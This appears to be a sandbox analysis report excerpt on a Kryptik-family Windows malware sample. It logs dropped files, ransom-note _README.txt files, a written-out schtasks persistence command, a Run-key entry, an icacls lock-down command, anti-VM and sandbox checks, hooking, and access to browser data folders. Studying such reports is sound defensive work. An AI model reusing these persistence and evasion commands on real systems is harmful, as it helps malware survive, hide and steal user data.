Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fcbhtea	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1601.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\fcbhtea

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\securiteinfo.com.w32.kryptik.gygf.tr.29287.4482.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\fcbhtea:Zone.Identifier read attributes | delete

Jump to behavior

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 1340005 value: E9 2B BA 2F 76
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 7763BA30 value: E9 DA 45 D0 89
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 1350008 value: E9 8B 8E 33 76
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 77688E90 value: E9 80 71 CC 89
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 2EA0005 value: E9 8B 4D 1C 74
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 77064D90 value: E9 7A B2 E3 8B
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 2EB0005 value: E9 EB EB 1C 74
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 7707EBF0 value: E9 1A 14 E3 8B
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 2EC0005 value: E9 8B 8A 70 72
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 755C8A90 value: E9 7A 75 8F 8D
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 2ED0005 value: E9 2B 02 72 72
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Memory written: PID: 3688 base: 755F0230 value: E9 DA FD 8D 8D

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

9_2_00481920

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: build2.exe PID: 7712, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\455F.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 455F.exe, 00000014.00000002.1999837553.00000000001A3000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe, 00000000.00000002.1443312479.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp, fcbhtea, 00000004.00000002.1682512855.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: build2.exe, 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\455F.exe	RDTSC instruction interceptor: First address: 5C09D9 second address: 5C0A01 instructions: 0x00000000 rdtsc 0x00000002 sbb dx, bp 0x00000005 xor cl, FFFFFFA0h 0x00000008 dec dl 0x0000000a sbb dx, 7C4Eh 0x0000000f add cl, 00000054h 0x00000012 stc 0x00000013 movzx dx, dh 0x00000017 ror cl, 1 0x00000019 neg cl 0x0000001b btc ax, dx 0x0000001f xor bl, cl 0x00000021 rcr ah, cl 0x00000023 push edi 0x00000024 clc 0x00000025 shr ax, cl 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\455F.exe	RDTSC instruction interceptor: First address: 276B84 second address: 276B8B instructions: 0x00000000 rdtsc 0x00000002 not ebp 0x00000004 pop ebx 0x00000005 cwd 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\455F.exe	RDTSC instruction interceptor: First address: 4CC111 second address: 4CC11C instructions: 0x00000000 rdtsc 0x00000002 movzx dx, dh 0x00000006 movsx dx, dl 0x0000000a pop ebp 0x0000000b rdtsc

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 8_2_048B671C rdtsc

8_2_048B671C

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

9_2_0040E670

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 444	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 802	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 796	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 781
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 738

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_9-42950

Source: C:\Users\user\AppData\Local\Temp\1601.exe TID: 6976	Thread sleep time: -700000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\455F.exe TID: 2100	Thread sleep time: -180000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	9_2_0040FB98

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: explorer.exe, 00000027.00000003.2094077748.0000000009426000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
